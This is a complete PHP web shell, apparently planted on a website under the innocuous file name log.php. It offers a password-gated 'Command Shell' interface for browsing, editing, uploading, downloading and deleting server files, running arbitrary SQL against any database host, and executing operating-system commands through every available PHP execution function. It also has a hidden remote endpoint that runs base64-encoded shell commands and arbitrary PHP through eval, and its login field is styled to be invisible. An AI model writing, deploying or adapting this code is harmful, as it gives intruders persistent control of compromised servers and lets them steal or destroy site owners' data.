File: /home/dermova/www/india/log.php
<?php
define("USER_PASS", "1a1dc91c907325c69271ddf0c944bc72"); // Password ( md5 ) Default : pass
define("THEME", "dark"); // Shell theme ( dark / light )
function get_os() {
return strtoupper(substr(PHP_OS, 0, 3));
}
function get_root_directory() {
return getcwd() . DIRECTORY_SEPARATOR;
}
function get_current_file() {
return (isset($_GET['file']) && file_exists($_GET['file'])) ? $_GET['file']:null;
}
function get_current_url() {
return "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"];
}
function get_current_path() {
if(!isset($_COOKIE["user_path"]) || !is_dir($_COOKIE['user_path']))
return get_root_directory();
if(isset($_GET['path']) && is_dir($_GET['path']))
return $_GET['path'];
return $_COOKIE["user_path"];
}
class CommandShell {
public function __construct() {
$this->operation = isset($_GET["act"]) ? $_GET["act"] : null;
$this->initializeCookies();
}
public function authenticate() {
if(!$this->is_logged_in()) {
if(@md5($_POST["password"]) == USER_PASS) {
setcookie("user_pass", USER_PASS, time() + (60 * 60 * 24), "/");
header("Location: " . get_current_url());
} else {
?>
<html>
<form method="POST">
<input name="password" type="text" style="border:0px">
</form>
</html>
<?php
}
exit();
}
}
public function sign_out() {
if($this->operation == "exit") {
setcookie("user_pass", null, time() - (60 * 60), "/");
setcookie("user_path", null, time() - (60 * 60), "/");
setcookie("user_sql", null, time() - (60 * 60), "/");
header("Location: " . get_current_url());
}
}
private function is_logged_in() {
if(!isset($_COOKIE["user_pass"]))
return false;
if($_COOKIE["user_pass"] != USER_PASS)
return false;
return true;
}
private function initializeCookies() {
if(!isset($_COOKIE["user_path"]) || !is_dir($_COOKIE['user_path']))
setcookie("user_path", get_root_directory(), time() + (60 * 60 * 24), "/");
elseif(isset($_GET['path']) && is_dir($_GET['path']))
setcookie("user_path", $_GET['path'], time() + (60 * 60 * 24), "/");
if(!isset($_COOKIE["user_sql"])) {
$databaseCookie = array("host", "username", "password", "database", "dbms");
} else {
$values = unserialize($_COOKIE["user_sql"]);
$databaseCookie = array();
$databaseCookie[] = (isset($_POST['host']) && @$_POST['host'] != "") ? $_POST['host'] : $values[0];
$databaseCookie[] = (isset($_POST['username']) && @$_POST['username'] != "") ? $_POST['username'] : $values[1];
$databaseCookie[] = (isset($_POST['password']) && @$_POST['password'] != "") ? $_POST['password'] : $values[2];
$databaseCookie[] = ((isset($_POST['database']) && @$_POST['database'] != "") ? $_POST['database'] : (isset($_GET['database']) ? $_GET['database'] : $values[3]));
$databaseCookie[] = (isset($_POST['dbms']) && @$_POST['dbms'] != "") ? $_POST['dbms'] : $values[4];
}
setcookie("user_sql", serialize($databaseCookie), time() + (60 * 60 * 24), "/");
}
public function download_file() {
if(isset($_POST["download"]) && $this->is_logged_in())
FileTransfer::download($_POST['path']);
}
public function display_info() {
?>
<table>
<tr><th>OS: <?php echo @php_uname(); ?></th></tr>
</table>
<table>
<tr><th>Server: <?php echo getenv('SERVER_SOFTWARE'); ?></th></tr>
</table>
<table>
<tr>
<th>Computer: <?php echo getenv('COMPUTERNAME'); ?></th>
<th>Domain: <?php echo @php_uname('n'); ?></th>
<th>User: <?php echo @get_current_user(); ?></th>
<th>IP: <?php echo (getenv('LOCAL_ADDR') != null) ? getenv('LOCAL_ADDR') : getenv('SERVER_ADDR'); ?></th>
</tr>
</table>
<?php
}
public function execute_actions() {
if($this->operation == "fbrowser") {
$fileBrowser = new FileBrowser(get_current_path());
$fileBrowser->render();
} elseif($this->operation == "feditor") {
$fileEditor = new FileEditor((get_current_file() ? get_current_file() : get_current_path()));
$fileEditor->execute();
$fileEditor->render();
} elseif($this->operation == "fuploader") {
FileTransfer::upload(get_current_path());
} elseif($this->operation == "cmd") {
Cmd::render();
} elseif($this->operation == "sql") {
$sqlHandler = new Database();
$sqlHandler->execute_query();
$sqlHandler->render();
} elseif($this->operation == "exit") {
$this->sign_out();
}
}
public function remote_access() {
function request($req) {
return isset($_GET[$req]) ? urldecode($_GET[$req]) : base64_decode($_POST[$req]);
}
if(isset($_REQUEST["remote"]) && @md5($_REQUEST["password"]) == USER_PASS) {
if(isset($_REQUEST["cmd"]))
Cmd::execute(request("cmd"));
elseif(isset($_REQUEST["php"]))
eval(request("php"));
elseif(isset($_REQUEST["info"]))
echo get_os() . ":" . @get_current_user() . "/" . @gethostname() . ":" . @getenv('SERVER_ADDR');
exit();
}
}
}
class FileBrowser {
public function __construct($path) {
$this->path = $path;
}
public function render() {
?>
<table class="file-browser">
<tr style="<?php echo Css::style("tr"); ?>">
<th>Current Directory: <?php echo $this->current_directory(); ?></th>
<th class="menu"><a href='?act=fbrowser&path=<?php echo get_root_directory(); ?>'>Home</a></th>
<th>Drives: <?php echo $this->list_drives(); ?></th>
<th></th>
<th></th>
</tr>
<tr style="<?php echo Css::style("tr"); ?>">
<th>Name</th><th>Size</th><th>Permissions</th><th>Created</th><th>Modified</th>
</tr>
<?php echo $this->list_files_and_dirs(); ?>
</table>
<?php
}
private function list_files_and_dirs() {
$directoryRow = "<tr><td><a href='?act=fbrowser&path=%s'>%s</a></td><td>%s</td><td>%s / %s</td><td>%s</td><td>%s</td></tr>";
$fileRow = "<tr><td><a href='?act=feditor&file=%s'>%s</a></td><td>%s</td><td>%s / %s</td><td>%s</td><td>%s</td></tr>";
$items = $this->scan_files_and_dirs();
if($items === false)
return "<tr><th>Can't access: $this->path</th></tr>";
$itemList = "";
foreach($items[0] as $directory)
$itemList .= sprintf($directoryRow, urlencode($directory[1] . DIRECTORY_SEPARATOR), $directory[0] . DIRECTORY_SEPARATOR, $directory[2], $directory[3], $directory[4], $directory[5], $directory[6]);
foreach($items[1] as $file)
$itemList .= sprintf($fileRow, urlencode($file[1]), $file[0], $file[2], $file[3], $file[4], $file[5], $file[6]);
return $itemList;
}
public function scan_files_and_dirs() {
$directories = array();
$files = array();
if(($scan_result = @scandir($this->path)) === false)
return false;
foreach($scan_result as $item) {
if($item != '.' && $item != '..') {
$fullPath = $this->path . $item;
if(is_dir($fullPath))
$directories[] = array(
$item, $fullPath, "Dir",
$this->get_owner_group($fullPath), $this->get_permissions($fullPath),
$this->get_creation_modification_date($fullPath), $this->get_creation_modification_date($fullPath, 9)
);
if(is_file($fullPath))
$files[] = array(
$item, $fullPath, $this->get_file_size($fullPath),
$this->get_owner_group($fullPath), $this->get_permissions($fullPath),
$this->get_creation_modification_date($fullPath), $this->get_creation_modification_date($fullPath, 9)
);
}
}
return array($directories, $files);
}
private function current_directory() {
$path = "";
$parts = explode(DIRECTORY_SEPARATOR, $this->path);
for($i = 0; $i < count($parts) - 1; $i++) {
$path .= $parts[$i] . DIRECTORY_SEPARATOR;
echo "<a href='?act=fbrowser&path=" . $path . "'>" . $parts[$i] . DIRECTORY_SEPARATOR . "</a>";
}
}
private function list_drives() {
foreach(range("A", "Z") as $drive) {
if(@is_readable($drive . ":" . DIRECTORY_SEPARATOR))
echo "<a href='?act=fbrowser&path=$drive:\\'>$drive:\\ </a>";
elseif(@is_dir($drive . ":" . DIRECTORY_SEPARATOR))
echo "$drive:\\ ";
}
}
private function get_file_size($path) {
$stat = stat($path);
if($stat[7] > (1024 * 1024))
return (int)($stat[7] / (1024 * 1024)) . " MB";
elseif($stat[7] > 1024)
return (int)($stat[7] / 1024) . " KB";
return $stat[7] . " B";
}
private function get_permissions($path) {
return substr(sprintf("%o", fileperms($path)), -4);
}
private function get_owner_group($path) {
$stat = stat($path);
return $stat[4] . ":" . $stat[5];
}
private function get_creation_modification_date($path, $d = 10) {
$stat = stat($path);
return date("d/m/Y H:i", $stat[$d]);
}
}
class FileEditor {
public function __construct($path) {
$this->path = isset($_POST['path']) ? $_POST['path'] : $path;
$this->content = "";
$this->notification = "";
}
public function execute() {
if(isset($_POST["read"]))
$this->read_file();
elseif(isset($_POST["write"]))
$this->write_file($_POST['content']);
elseif(isset($_POST["remove"]))
$this->notification = $this->remove_file($this->path) ? "Deleted." : "Failed.";
elseif(isset($_POST["rename"]))
$this->rename_file((get_current_file() == null) ? get_current_path() : get_current_file());
elseif(isset($_POST["mkdir"]))
$this->create_directory();
}
public function render() {
?>
<form method="POST">
<input name="path" type="text" size="60" value="<?php echo $this->path; ?>">
<input name="read" type="submit" value="read >>">
<input name="write" type="submit" value="write >>">
<input name="remove" type="submit" value="remove >>">
<input name="rename" type="submit" value="rename >>">
<input name="mkdir" type="submit" value="mkdir >>">
<input name="download" type="submit" value="download >>">
<b><?php echo $this->notification; ?></b>
<pre class="sep"><textarea name="content"><?php echo $this->content; ?></textarea></pre>
</form>
<?php
}
private function read_file() {
if(($data = @file_get_contents($this->path)) !== false)
$this->content = $this->is_html($data) ? htmlspecialchars($data) : $data;
else
$this->notification = "Can't access file.";
}
private function write_file($data) {
$this->notification = (@file_put_contents($this->path, $data) !== false) ? "Saved." : "Failed.";
}
private function remove_file($path) {
if(!is_file($path) && !is_dir($path))
return false;
if(is_file($path))
return @unlink($path);
if(($dir_content = @scandir($path)) === false)
return false;
foreach($dir_content as $item)
if($item != "." && $item != "..")
$this->remove_file($path . DIRECTORY_SEPARATOR . $item);
return @rmdir($path);
}
private function rename_file($new_path) {
$this->notification = (@rename($this->path, $new_path) !== false) ? "Renamed." : "Failed.";
}
private function create_directory() {
$this->notification = (@mkdir($this->path) !== false) ? "Created." : "Failed.";
}
private function is_html($data) {
if(preg_match('/<html/im', $data) || preg_match('/<body/im', $data))
return true;
if(preg_match('/<form(.*?)form>/im', $data) || preg_match('/<table(.*?)table>/im', $data))
return true;
return false;
}
}
class FileTransfer {
public static function upload($path) {
?>
<form method="POST" enctype="multipart/form-data">
<input name="path" type="text" size="60" value="<?php echo $path; ?>">
<input name="file" type="file">
<input name="upload" type="submit" value=" >>">
</form>
<?php
if(isset($_POST["upload"])) {
$destination = $_POST["path"] . basename($_FILES["file"]["name"]);
if(move_uploaded_file($_FILES["file"]["tmp_name"], $destination))
echo "<b>File uploaded.</b>";
else
echo "<b>Failed.</b>";
}
}
public static function download($file) {
header("Content-Disposition: attachment; filename=\"" . @basename($file) . "\"");
header("Content-Length: \"" . @filesize($file) . "\"");
header("Content-Type: application/octet-stream;");
@readfile($file);
exit();
}
}
class Database {
private $show_dbs = "SHOW DATABASES;";
private $show_tbls = "SHOW TABLES;";
private $mssql_dbs = "SELECT name FROM master.dbo.sysdatabases";
private $mssql_tbls = "SELECT * FROM INFORMATION_SCHEMA.TABLES;";
public function __construct() {
$cookies = isset($_COOKIE["user_sql"]) ? unserialize($_COOKIE["user_sql"]) : array("host", "username", "password", "database", "dbms");
$get_db = isset($_GET['database']) ? urldecode($_GET['database']) : null;
$get_table = isset($_GET['table']) ? urldecode($_GET['table']) : null;
$this->host = isset($_POST['host']) ? $_POST['host'] : $cookies[0];
$this->username = isset($_POST['username']) ? $_POST['username'] : $cookies[1];
$this->password = isset($_POST['password']) ? $_POST['password'] : $cookies[2];
$this->database = (isset($get_db) ? $get_db : (isset($_POST['database']) ? $_POST['database'] : $cookies[3]));
$this->dbms = isset($_POST['dbms']) ? $_POST['dbms'] : $cookies[4];
$this->query = (isset($get_db) ? "SHOW TABLES;" : (isset($get_table) ? "SELECT * FROM $get_table;" : $this->show_dbs));
if(isset($_POST["submit"]))
$this->query = ((@$_POST['query'] != "") ? $_POST['query'] : ($this->dbms == "mssql" ? $this->mssql_dbs : $this->show_dbs));
$this->output = "";
}
public function render() {
?>
<form method="POST">
<input name="host" type="text" size="12" value="<?php echo $this->host; ?>" onclick="clearValue('host')">
<input name="username" type="text" size="12" value="<?php echo $this->username; ?>" onclick="clearValue('username')">
<input name="password" type="text" size="12" value="<?php echo $this->password; ?>" onclick="clearValue('password')">
<input name="database" type="text" size="12" value="<?php echo $this->database; ?>" onclick="clearValue('database')">
<input name="dbms" type="text" size="12" value="<?php echo $this->dbms; ?>" onclick="clearValue('dbms')">
<input name="query" type="text" size="60" value="<?php echo $this->query; ?>" onclick="clearValue('query')">
<input name="submit" type="submit" value=" >>">
</form>
<div class="sep">
<?php echo $this->output; ?>
</div>
<?php
}
public function execute_query() {
if(isset($_POST['submit']) || isset($_GET['database']) || isset($_GET['table'])) {
$dsn = "$this->dbms:host=$this->host; dbname=$this->database";
try {
@$conn = new PDO("$this->dbms:host=$this->host; dbname=$this->database", $this->username, $this->password);
@$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
@$query = $conn->prepare($this->query);
try {
@$query->execute();
if(strtoupper(substr($this->query, 0, 6)) == "SELECT" || strtoupper(substr($this->query, 0, 4)) == "SHOW")
$this->read_results($query);
else
$this->output = "<b>Query executed.</b>";
} catch(PDOException $e) {
$this->output = "<b>Query failed.</b>" . $e->getMessage();
}
} catch(PDOException $e) {
$this->output = "<b>Connection failed: </b>" . $e->getMessage();
}
$conn = null;
}
}
private function read_results($query) {
$this->output = "<table class='sql'>";
$result = @$query->setFetchMode(PDO::FETCH_ASSOC);
foreach($query->fetchAll() as $index => $row) {
if($index == 0) {
$this->output .= "<tr>";
foreach($row as $name => $value)
$this->output .= "<th>$name</th>";
$this->output .= "</tr>";
}
$this->output .= "<tr>";
foreach($row as $name => $value) {
if(strtoupper($name) == "DATABASE")
$this->output .= "<td><a href='?act=sql&database=" . urlencode($value) . "'>" . $value . "</a></td>";
elseif(strtoupper(substr($name, 0, 5)) == "TABLE")
$this->output .= "<td><a href='?act=sql&table=" . urlencode($value) . "'>" . $value . "</a></td>";
else
$this->output .= "<td>" . htmlspecialchars($value) . "</td>";
}
$this->output .= "</tr>";
}
$this->output .= "</table>";
}
}
class Cmd {
public static function render() {
?>
<form method="POST">
<input name="cmd" type="text" size="80" value="cmd_" onclick="clearValue('cmd', 'any')">
<input name="run" type="submit" value=" >>">
</form>
<?php
if(isset($_POST["run"])) {
$command = @$_POST["cmd"] . " 2>&1";
echo "<pre>";
Cmd::execute($command);
echo "</pre>";
}
}
public static function execute($command) {
if(is_callable("system"))
system($command);
elseif(is_callable("passthru"))
passthru($command);
else
echo Cmd::output($command);
}
public static function output($command) {
$output = "";
if(is_callable("shell_exec")) {
$output = shell_exec($command);
} elseif(is_callable("exec")) {
exec($command, $outputLines);
foreach($outputLines as $line)
$output .= $line . PHP_EOL;
} elseif(is_callable("popen")) {
if(($process = popen($command, 'r')) !== false) {
while(!feof($process))
$output .= fread($process, 1024);
pclose($process);
}
} elseif(is_callable("proc_open")) {
$descriptors = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$proc = proc_open($command, $descriptors, $pipes);
while(!feof($pipes[1]))
$output .= fread($pipes[1], 1024);
fclose($pipes[1]);
proc_close($proc);
} else {
$output = "Failed.";
}
return $output;
}
}
class Css {
public static function colors() {
if(THEME == "dark")
$colors = array(
"color" => "#ddefff", "background" => "#181818",
"link" => "#ddefff", "visited" => "#83c5ff", "hover" => "#202020"
);
else
$colors = array(
"color" => "#181818", "background" => "#f0f8ff",
"link" => "#015fb2", "visited" => "#00437e", "hover" => "#ddefff"
);
return $colors;
}
public static function style($part = "color") {
$colors = Css::colors();
if($part == "body" || $part == "table" || $part == "tr" || $part == "th" || $part == "td") {
return sprintf(" color:%s; background-color:%s; ", $colors['color'], $colors['background']);
} elseif($part == "input") {
if(THEME == "dark")
return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $colors['background'], $colors['color'], $colors['visited']);
else
return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $colors['hover'], "#242424", $colors['link']);
} elseif($part == "hover") {
return sprintf(" color:%s; background-color:%s; ", $colors['color'], $colors['hover']);
} else {
return $colors;
}
}
}
?>
<?php $shell = new CommandShell(); ?>
<?php $shell->remote_access(); ?>
<?php $shell->authenticate(); ?>
<?php $shell->sign_out(); ?>
<?php $shell->download_file(); ?>
<?php $colors = Css::colors(); ?>
<html>
<head>
<title>Command Shell</title>
<style>
body { <?php echo Css::style("body"); ?> text-align:left; padding:2px; font-size:12px; }
table { <?php echo Css::style("table"); ?> border-collapse:collapse; width:100%; padding:2px; font-size:12px; }
th { font-size:13px; text-align:left; padding:2px; }
td { font-size:12px; text-align:left; padding:2px; }
table.file-browser tr { <?php echo Css::style("tr"); ?> }
table.file-browser tr:hover { <?php echo Css::style("hover"); ?> }
.sql { border:1px solid <?php echo $colors['color']; ?>; <?php echo Css::style("table"); ?> width:100%; padding:2px; font-size:12px;}
.sql th { <?php echo Css::style("th"); ?> border:1px solid <?php echo $colors['color']; ?>;}
.sql td { font-size:12px; text-align:left; padding:2px; }
.sql tr { <?php echo Css::style("tr"); ?> }
.sql tr:hover { <?php echo Css::style("hover"); ?> }
input { <?php echo Css::style("input"); ?> font-size:12px; padding:2px; }
textarea { width:100%; height:100%; }
div { padding:2px; }
.sep { padding:0px; }
a:link { color:<?php echo $colors['link']; ?>; }
a:visited { color:<?php echo $colors['visited']; ?>; }
.menu { text-align:left; padding:2px; font-size:13px; }
.menu a { color:<?php echo $colors['color']; ?>; text-decoration:none; }
</style>
<script>
function clearValue(name, value="") {
if(
document.getElementsByName(name)[0].value == name
|| document.getElementsByName(name)[0].value == value
|| value == "any"
)
document.getElementsByName(name)[0].value = "";
}
</script>
</head>
<body>
<div>
<?php $shell->display_info(); ?>
</div>
<div>
<hr>
<table class="menu">
<tr>
<th><a href="?act=fbrowser">File Browser</a></th>
<th><a href="?act=feditor">File Editor</a></th>
<th><a href="?act=fuploader">File Uploader</a></th>
<th><a href="?act=cmd">Run Command</a></th>
<th><a href="?act=sql">SQL Queries</a></th>
<th><a href="?act=exit">Exit</a></th>
</tr>
</table>
<hr>
</div>
<div>
<?php $shell->execute_actions(); ?>
</div>
</body>
</html>